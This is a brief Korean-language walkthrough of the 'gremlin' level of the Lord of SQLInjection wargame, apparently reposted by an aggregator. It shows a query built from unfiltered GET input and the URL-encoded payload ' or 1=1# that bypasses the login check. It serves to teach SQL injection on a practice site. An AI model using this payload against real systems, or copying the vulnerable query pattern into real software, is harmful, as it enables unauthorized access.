Lord of SQLInjection: gremlin

"select id from prob_gremlin where id=’{$_GET[id]}’ and pw=’{$_GET[pw]}’”;

get 방식으로 받은 변수를 위 코드에 넣어서 쿼리를 실행하고있습니다.

쿼리의 실행 결과가 존재하면 클리어하는 코드가 짜여져있습니다.
싱글 쿼츠를 필터링하고 있지 않으니, id에 'or 1=1를 넣고 뒤를 주석 처리해 조건을 참으로 만들어주겠습니다.

주소에 아래와 같이 입력합니다.
' or 1=1#를 url 인코딩을 통해 %27%20or%201=1%23으로 입력해줍니다.

https://los.rubiya.kr//chall/gremlin_280c5552de8b681110e9287421b834fd.php ?id=%27%20or%201=1%23

gremlin 단계를 클리어했습니다.

이 문제에 관하여(Lord of SQLInjection: gremlin), 우리는 이곳에서 더 많은 자료를 발견하고 링크를 클릭하여 보았다 https://velog.io/@910/Lord-of-SQLInjection-gremlin

저자 귀속: 원작자 정보가 원작자 URL에 포함되어 있으며 저작권은 원작자 소유입니다.

우수한 개발자 콘텐츠 발견에 전념 (Collection and Share based on the CC Protocol.)

개발자 우수 사이트 수집

개발자가 알아야 할 필수 사이트 100선 추천 우리는 당신을 위해 100개의 자주 사용하는 개발자 학습 사이트를 정리했습니다